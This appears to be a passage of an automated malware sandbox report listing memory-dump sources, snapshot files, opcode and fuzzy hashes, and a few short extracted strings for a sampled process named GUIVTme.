                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.1832133364.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_de0000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b50b3b0c6d0d480e71f8dbd662e5757c6dd910f94265ac1035a7e56cb7c9221b
                                                                                        • Instruction ID: b64b8dee594993b20b9f8e84a31188972213438c0a7359416107a7b7625b3f0e
                                                                                        • Opcode Fuzzy Hash: b50b3b0c6d0d480e71f8dbd662e5757c6dd910f94265ac1035a7e56cb7c9221b
                                                                                        • Instruction Fuzzy Hash: F5E09275C06298AECF11DFB854461DEBFF0AD05200B1045AAC45AE3201E2B0860ACFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.1832133364.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_de0000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ea815cc2eb9ed6ba5151f6458082a2b39e7719c1fbdc2c53d1eddda73400ca06
                                                                                        • Instruction ID: 993bcd19bb6dcc694013e114201fa19fc2e9e3ab60f2c0c5a59e5f0bc864d309
                                                                                        • Opcode Fuzzy Hash: ea815cc2eb9ed6ba5151f6458082a2b39e7719c1fbdc2c53d1eddda73400ca06
                                                                                        • Instruction Fuzzy Hash: 11F01578A00346CFDB24EB65C558BAD7BB0AB48704F290858D412AB3A0CBB48C84CB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.1832133364.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_de0000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 53b096e36d679fabb356dfdfe8de6a2cf0c34675bf13f2f45bc1cebfdbe47cab
                                                                                        • Instruction ID: 57ae44e9740c3f24e0bcd558546d7e2ff59b3140b2a37f4026166624523834a5
                                                                                        • Opcode Fuzzy Hash: 53b096e36d679fabb356dfdfe8de6a2cf0c34675bf13f2f45bc1cebfdbe47cab
                                                                                        • Instruction Fuzzy Hash: 8ED067B1D01219AF8B40EFB999051DEBBF8FE09650B104566D959E3200E6709A10CBE1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.1912263114.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_2c30000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: tP^q
                                                                                        • API String ID: 0-2862610199
                                                                                        • Opcode ID: 685b8bbab590067942a21b90ce50bf0e0c2320bcdc9b71d65484053a920af2f7
                                                                                        • Instruction ID: 8a1cbcaf776024ac3c958021b8a4560927e02d3064869c7efef760ab79b82e7b
                                                                                        • Opcode Fuzzy Hash: 685b8bbab590067942a21b90ce50bf0e0c2320bcdc9b71d65484053a920af2f7
                                                                                        • Instruction Fuzzy Hash: 7E3124717406108FCB59AB38C55891D3BE2AF8A71936508A8E50ACF375DE35DC82CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.1912263114.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_2c30000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: tP^q
                                                                                        • API String ID: 0-2862610199
                                                                                        • Opcode ID: fd34dec5ffa52ccf68f5baa55bb1b8e088e382eac4232028e52d71e04270a1ab
                                                                                        • Instruction ID: f3ae5dbc20685d338e3a72fc219f31c4f3b2c8502cddb49e321c945b9fc585fd
                                                                                        • Opcode Fuzzy Hash: fd34dec5ffa52ccf68f5baa55bb1b8e088e382eac4232028e52d71e04270a1ab
                                                                                        • Instruction Fuzzy Hash: B92116757406108FCB59AB38C55881D7BE2AF8AB1936508B8E50ACF375DE36DC42CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.1912263114.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_2c30000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8bq
                                                                                        • API String ID: 0-187764589
                                                                                        • Opcode ID: 20657e34046b6e6d094cde2f45eed2b4393f396e1044a8d4c004da504236982c
                                                                                        • Instruction ID: 7980ffe7bd2bcc632554f23c30c0df362d5d18aa979c7cb5d0d38627f1e2bc33
                                                                                        • Opcode Fuzzy Hash: 20657e34046b6e6d094cde2f45eed2b4393f396e1044a8d4c004da504236982c
                                                                                        • Instruction Fuzzy Hash: 8D11D071B00218AFC748EBB8D454BDD7BE6EB88344F108068C509A7384EF348E06CB86
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.1912263114.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_2c30000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d3f7ade442b09211c3a882d6790b7c131624bad71da318ca0766249f19b2b110
                                                                                        • Instruction ID: c5469371e30946a3790d3ad749cf85f5b4d099774ed974ae4eb34a5e4e1cea66
                                                                                        • Opcode Fuzzy Hash: d3f7ade442b09211c3a882d6790b7c131624bad71da318ca0766249f19b2b110
                                                                                        • Instruction Fuzzy Hash: 8F224C31B04602CFD719EFB5D49066A73B2FBC8355B14893DC45A8B388EB75E882CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.1912263114.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_2c30000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 353f597cd04d77bb723587a67c213b71b1ddd0f9ee09d59488f8f378004f6962
                                                                                        • Instruction ID: 0d7c95f975a6caf54a174a4a65e00f8aad7cbdf8ad5c97d0564b0e8435982d72
                                                                                        • Opcode Fuzzy Hash: 353f597cd04d77bb723587a67c213b71b1ddd0f9ee09d59488f8f378004f6962
                                                                                        • Instruction Fuzzy Hash: B781C635A00345CFCB2A9FB4C4586A9BBF2FF88310F048969D4569B768DB75AC85CB80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.1912263114.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_2c30000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ae72b609f8cb1dc2b9b1d6a2b0858944f0dea4bd779185e520070dd71eb2d5bc
                                                                                        • Instruction ID: acdde4c4ddb83939db816b24d81a5fe267d56aa7c007ec21fe9400b288eef49d
                                                                                        • Opcode Fuzzy Hash: ae72b609f8cb1dc2b9b1d6a2b0858944f0dea4bd779185e520070dd71eb2d5bc
                                                                                        • Instruction Fuzzy Hash: 73115B76E002469FCB41EFB4D984AABBBF1FF89300B10866AE51997225E7749911CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.1912263114.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_2c30000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 69741192b6c7fd0554a5107685b786e5296fdba4cc12a0b5565983d140f6dc98
• Instruction ID: e3446e09a8b71882703ef09818c00b465632ee8356b142ad97784615d958f00a
• Opcode Fuzzy Hash: 69741192b6c7fd0554a5107685b786e5296fdba4cc12a0b5565983d140f6dc98
• Instruction Fuzzy Hash: 8F015E76E002069FCB40EFB4D8449ABFBF5FF89310710866AE51997324E770A955CB90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000013.00000002.1912263114.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2c30000_GUIVTme.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 83ad583a420a128b948b1f7b34982e3b2b1bde2d69a4629c66420fd30b603043
• Instruction ID: a33cede2d051cc8a6f8cbe24a1bbfb95f7caae96ab808989f67926b110787474
• Opcode Fuzzy Hash: 83ad583a420a128b948b1f7b34982e3b2b1bde2d69a4629c66420fd30b603043
• Instruction Fuzzy Hash: 83F01C75A00315CFDB25EBA4C5587AD7BF0AB48708F180868D416EB260DBB48D84CB50
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000013.00000002.1912263114.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2c30000_GUIVTme.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6dc942df67aa483f597f4efe142f978a2c2e8a8d5a3c24d2f2887fa6c4f7fc53
• Instruction ID: 2396d7e57ea0f427cffc2ebaca3e8ab3000884e3f89704a0441b37627621f444
• Opcode Fuzzy Hash: 6dc942df67aa483f597f4efe142f978a2c2e8a8d5a3c24d2f2887fa6c4f7fc53
• Instruction Fuzzy Hash: 08E04F72D01219AFCB40EFFDA5095EA7FF4FE08610B400575D619E7604E7709640CBD2
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000013.00000002.1912263114.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2c30000_GUIVTme.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5d67e505f411a9bc7355f6912447f1259eeea765849cfe290bda30c99dfd7fda
• Instruction ID: 241102a33be528fe2da000b50c91601b4a08227a59c732345e074ac1e26f025b
• Opcode Fuzzy Hash: 5d67e505f411a9bc7355f6912447f1259eeea765849cfe290bda30c99dfd7fda
• Instruction Fuzzy Hash: D6D067B1D05229AF8B50EFFD99051DEBBF8EE09250B104576D919E7204E6745A10CBD1
Uniqueness

Uniqueness Score: -1.00%